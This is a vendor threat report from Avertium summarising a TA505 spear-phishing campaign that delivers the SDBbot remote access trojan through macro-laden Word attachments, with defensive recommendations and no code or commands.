This report is about a new series of spear-phishing emails by a well-known dangerous threat actor known as Hive0065 or TA505. Several of these phishing emails involve a macro-infested Word document using a fake Office 365 link.
Based upon the research we have seen; the threat actor creates a miniature deployable version of two well-known tools, CobaltStrike and Meterpreter. Those tools are implemented as DLL file downloads via the Macros built into the spear-phishing email attachments. The modular nature of those DLL files allows for an executable to be deployed designed to create a reverse shell on the infected host.
The reverse shell is used to download a remote access trojan called SBDbot onto the infected host. SDBbot is designed to maintain command and control connections with the threat actor’s infrastructure. It utilizes the built Windows process called winlogon.exe. The trojan does check whether Windows 7 or Windows 10 is installed. All the command and control traffic is communicated through a DWORD hexadecimal value.
When the user opens the spear-phishing email attachment, it creates a fake Microsoft login window. This allows the bad actor to collect sensitive user credentials for later use. The credentials get used when the SDBbot RAT injects into the winlogon.exe system process.
These attacks could result in the loss of sensitive credentials leading to persistent and pervasive malware infection. The threat actor is well-known for infecting systems in order to gain financial advantages.
It is highly encouraged that you consider blocking the indicators of compromise listed via the link below. Consider implementing a user training program to encourage better security awareness throughout the organization. It may be prudent to review the PowerShell logs you’re collecting in your environment so you can tune for encoded scripts being run against the network.
Related Reading: Top 5 Warning Signs When Opening Email
Security Intelligence Article: https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/
Supporting Documentation:
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report outlines a “top-of-mind” threat and how it ought to be addressed accordingly.
This informed analysis is based on the latest data available.
Contact us for more information about Avertium’s managed detection and response service capabilities.
Cybersecurity is no accident. With Avertium, you get more rigor, more relevance, and more responsiveness than with other MSSPs. Bulk up your security posture with Avertium's Managed Security Services. Show no weakness.